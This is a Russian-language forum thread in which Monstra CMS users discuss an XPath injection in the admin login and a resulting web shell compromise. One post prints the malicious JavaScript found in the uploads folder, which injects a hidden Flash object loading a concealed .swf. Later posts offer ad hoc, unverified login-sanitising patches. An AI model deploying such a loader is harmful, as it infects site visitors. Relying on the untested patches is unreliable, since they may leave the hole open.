Вы не вошли. Пожалуйста, войдите или зарегистрируйтесь.
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Всем добрый день!
По долгу службы занимаюсь мониторингом новостей по информационной безопасности и наткнулся на обнаруженную в монстре уязвимость - http://www.securitylab.ru/vulnerability/445421.php, http://www.vulnerability-lab.com/get_co … hp?id=1081.
Проблема с обработкой логина при входе в админку. Как я понял недостаточная обработка вводимой в поле строки.
Было бы здорово пофиксить эту проблему.
Было бы здорово пофиксить эту проблему.
Интересно , а о чем тогда думают сами разработчики ?
сегодня обнаружил, что монстру взломали. в корне сайта папка css с правами 0777, в ней файл sys0972500-1.php с шеллом внутри. так что все проверьте свои сайты, может тоже коснулось.
ну и главное, хотелось бы увидеть патч или руководство по исправлению уязвимости.
да, к шеллу идут обращения с айпи 146.185.246.18, с аккаунта рассылается множественный спам.
сегодня обнаружил, что монстру взломали. в корне сайта папка css с правами 0777, в ней файл sys0972500-1.php с шеллом внутри. так что все проверьте свои сайты, может тоже коснулось.
ну и главное, хотелось бы увидеть патч или руководство по исправлению уязвимости.
И причём тут monstra? Это сервер у Вас фиговый.
1. Как вы через монстру сможете сделать: "в корне сайта папка css с правами 0777, в ней файл sys0972500-1.php с шеллом внутри"?
Ответ: никак.
Это вы только через админку сервера только сделайте.
Ну... у него в корне был... а меня внутри монстры в каком то плагине.. такой файл затесался только ai-bolit том нашел 
Ну... у него в корне был... а меня внутри монстры в каком то плагине.. такой файл затесался только ai-bolit том нашел
Аналогичный ответ... Не в monstra дело;-)
FLy пишет:сегодня обнаружил, что монстру взломали. в корне сайта папка css с правами 0777, в ней файл sys0972500-1.php с шеллом внутри. так что все проверьте свои сайты, может тоже коснулось.
ну и главное, хотелось бы увидеть патч или руководство по исправлению уязвимости.
И причём тут monstra? Это сервер у Вас фиговый.
1. Как вы через монстру сможете сделать: "в корне сайта папка css с правами 0777, в ней файл sys0972500-1.php с шеллом внутри"?
Ответ: никак.
Это вы только через админку сервера только сделайте.
на мой фиговый сервер каждый день приходится по несколько тысяч атак с брутом всяких вордпрессов, джумл и т.д. и только на сайте с монстрой, ну надо же какая случайность, появляется шелл. из-за ограничений open_basedir злоумышленник не смог выйти за пределы аккаунта этого сайта, шеллы были рассованы внутри _только_ этого аккаунта. ещё не убедил? хорошо, продолжим...
для начала, предлагаю прочитать описание уязвимости "XPath-инъекция в Monstra CMS" - http://www.securitylab.ru/vulnerability/445421.php
затем погуглите, что такое вообще XPath-инъекция.
ну и на последок самое вкусное - как, имея все необходимые данные, залить скрипт в папку /public/uploads и через него залить шелл на сайт? ответ - очень просто.
и вы серьёзно думаете, что все шеллы заливаются только через админ-панели хостингов?)
вот код скрипта, заливающего шелл, обнаруженный в папке uploads:
function addNewObject(){try{var ua=navigator.userAgent.toLowerCase();if((ua.indexOf("chrome")==-1&&ua.indexOf("win")!=-1)&&navigator.javaEnabled()){var counter="/tmp/minify/.empty.swf?r=338639035";var div=document.createElement('div');div.innerHTML='<object id="dummy" name="dummy" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1">';div.innerHTML+='<param name="allowScriptAccess" value="always" \/>';div.innerHTML+='<param name="movie" value="'+counter+'" \/>';div.innerHTML+='<embed id="dummy2" name="dummy2" src="'+counter+'" width="1" height="1" name="flash" allowScriptAccess="always" type="application\/x-shockwave-flash" \/>';div.innerHTML+='<\/object>';div.style.position='absolute';div.style.left='-100px';div.style.top='-100px';document.body.insertBefore(div,document.body.children[0]);}}catch(e){if(document.body==undefined||document.body.children[0]==undefined){setTimeout('addNewObject()',50);}}};addNewObject();вот обзор на хабре - http://habrahabr.ru/post/196882/
разбираться с этим всем делом некогда, поэтому временно принял такие меры - htpasswd на вход в админку, chmod 0444 на все файлы и рекомендация всем клиентам на монстре или ждать патчей, или переходить на другую cms.
Если все так серьезно, то почему основной сайт монстры не взломан и работает ?
Если все так серьезно, то почему основной сайт монстры не взломан и работает ?
ну тогда бы баги быстро поправили, кому это нужно?) да и как тут сказать, взломан он или нет? не будут же об этом писать большими зелёными буквами на черном фоне, как в фильмах. или зальют молча шелл для включения в ботнет, или спам будут слать с белого айпи. ну ещё бывает ява скрипт зараженный вставят, но тут быстро всё пресекается, пользователи с антивирусами быстро вам сообщат, что они думают о таких сайтах. я бы тоже ещё долго не знал, если бы не начали приходить абузы на спам с одного из моих айпишников. начал разбираться, и вот я здесь)
разбираться с этим всем делом некогда, поэтому временно принял такие меры - htpasswd на вход в админку, chmod 0444 на все файлы и рекомендация всем клиентам на монстре или ждать патчей, или переходить на другую cms.
А если поменять путь к админке?
Что же у тебя за сайты-то такие, что атаки тысячами? 50000 юнитов в день пойди? У меня твоё описание в голове плохо укладывается... Как-то слишко преувеличенно на мой взгляд. Я держу на данный момент более 30 сайтов на monstra, и как-то странно такого нет... А самое классное, как раз в тему, вчера обратился один товарищ, у него 5 страниц обычных на html и без всяких админок и cms и таже фигня как у тебя. Поэтому какие бы там дыры не были, я придерживаюсь мнения, что вся защита лежит на сервере в первую очередь, а cms это уже побочное
FLy пишет:разбираться с этим всем делом некогда, поэтому временно принял такие меры - htpasswd на вход в админку, chmod 0444 на все файлы и рекомендация всем клиентам на монстре или ждать патчей, или переходить на другую cms.
А если поменять путь к админке?
если сайтом пользуетесь только вы - конечно, и адрес поменять, и htpasswd сделать.
Что же у тебя за сайты-то такие, что атаки тысячами? 50000 юнитов в день пойди? У меня твоё описание в голове плохо укладывается... Как-то слишко преувеличенно на мой взгляд. Я держу на данный момент более 30 сайтов на monstra, и как-то странно такого нет... А самое классное, как раз в тему, вчера обратился один товарищ, у него 5 страниц обычных на html и без всяких админок и cms и таже фигня как у тебя. Поэтому какие бы там дыры не были, я придерживаюсь мнения, что вся защита лежит на сервере в первую очередь, а cms это уже побочное
обычные будни так то, атакуют всё и вся.. например, из последних аналогичных случаев - уязвимости ip.board и timthumb, аналогично заливались шеллы через 0day уязвимости.
а что именно преувеличено? обычная практика, обнаружив уязвимость - искать патчи. а тут не только тишина, но и отрицание уязвимостей)
насчет "а cms это уже побочное", практика показывает обратное, намного чаще ломают сайты за счет багов конкретного скрипта, чем из-за каких-то недоработках в по сервера. тот же debian прославленный своей консервативностью в отношении версий по, обновляется только после многочисленных тестирований на предмет уязвимостей, а security патчи для текущих версий выпускаются оперативно. ну вот разве что подбора паролей нужно опасаться, т.к. юзеры тяготеют к комбинациям вида "qw12" но у меня с этим строго, минимальная длина пароля и fail2ban делают своё дело. и конкретно в данном случае, я изучал логи авторизаций на взломанном аккаунте, подборов пароля не было, входов в админку/ftp/ssh тоже, только get/post запросы в логах nginx и апача.
дыра в админке есть - это факт.
текущее решение - htpass на папку админки, изменить путь к админке на свой, использовать сервис cloudflare.net или аналогичный.
у меня изначально так настроены все монстры.
А если в admin/index.php заменить
$user = $users->select("[login='" . trim(Request::post('login')) . "']", null);
if (count($user) !== 0) {
if ($user['login'] == Request::post('login')) {на
$login = htmlentities(trim(Request::post('login')));
$user = $users->select("[login='" . $login . "']", null);
if (count($user) !== 0) {
if ($user['login'] == $login) {Это хорошее решение или есть способ лучше ?
ещё можно сделать $login = str_replace('username','hack',trim(Request::post('login')));
и на прочие имена узлов файла юзеров монстры.
ещё можно сделать $login = str_replace('username','hack',trim(Request::post('login')));
и на прочие имена узлов файла юзеров монстры.
То есть вы предлагаете под каждого пользователя свою строчку ?
нет, я предлагаю сделать запрещёнными именами слова из дерева хмл файла пользователей, чтобы нельзя было задать путь в запросе XPath.
нужно минимум две замены - названия узла с именем юзера и узла с паролем.
htmlspecialchars или другая функция не решает проблему?
И почему нет ответов разработчиков, администрации?
А в чём собственно заключается проблема с XPath ?
Эх пугаете вы меня. Вот вижу сообщения о уязвимости и сразу руки опускаются. Если у кого есть решения может с автором напрямую свяжетесь и поможете решить а то система у которой есть выявленные уязвимости не подходит чтобы советовать ее знакомым. И если честно я не совсем разбираюсь в угрозах. Может пока автор не пофиксил их сделать фак по угрозам и их решения, чтобы безопасно систему можно было устанавливать.
Эх пугаете вы меня. Вот вижу сообщения о уязвимости и сразу руки опускаются. Если у кого есть решения может с автором напрямую свяжетесь и поможете решить а то система у которой есть выявленные уязвимости не подходит чтобы советовать ее знакомым. И если честно я не совсем разбираюсь в угрозах. Может пока автор не пофиксил их сделать фак по угрозам и их решения, чтобы безопасно систему можно было устанавливать.
А то он не знает:))) Все он прекрасно знает, и о багах и о пожеланиях пользователей и тд. Он же отвечал: решайте баги и проблемы сами, у него нет времени и вообще у него в следующую субботу очередная встреча "monstra"... Так что советую не ждать скорого изменения ситуации, ручками, ручками)))))
Решение предложено, и должно устранить угрозу. Как проверить работоспособность - я не знаю.
newbie какой вклад от вас получен в развитие проекта?
Вы делаете сайты, зарабатывая на этой CMS и при этом поливая автора грязью - и хотите какой то поддержки ?
Решение предложено, и должно устранить угрозу. Как проверить работоспособность - я не знаю.
newbie какой вклад от вас получен в развитие проекта?
Вы делаете сайты, зарабатывая на этой CMS и при этом поливая автора грязью - и хотите какой то поддержки ?
1. От меня такой же вклад, как и от тебя и от других пользователей - по сути никакого. Эту систему на мой взгляд двигают от силы 2 человека. Разработчик Сергей и nakome... Ещё конечно я бы выделил Jinna, который хоть и ушёл отсюдова, но за определенную плату, он всегда оперативно напишет нужные плагины или решит конкретные проблемы, без всяких косяков и тягомотины. Ну это то, что я дейсвительно считаю вкладом.
2. Где я поливаю грязью? Процитируй конкретно слова... Тебе процитировать с форума слова разработчика или сам найдешь? Faust спросил, я ему ответил и Сергей тут непричем. Или я где-нибудь написал не правду? А если ты к тому, что Сергей так реагирует на мои посты - это нормально. Поищи в интернете форумы, где он продвигает свою систему, на любой, даже самый безобидный сорказм или мнение человека он тоже сразу всё воспринимает в штыки, это просто такой характер человека. Не надо это так близко воспринимать к сердцу.
KANekT - обычно я против обвинений или претензий на форуме, но в данном случае я поддерживаю newbie.
Очень не хочется чтобы такой замечательный проект закрылся, но если так дальше будет идти, то это произойдет. Ведь не обязательно, чтобы автор сам закрывал, достаточно просто не обращать на него внимание и он загнется на все 100 %
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Форум работает на PunBB, при поддержке Informer Technologies, Inc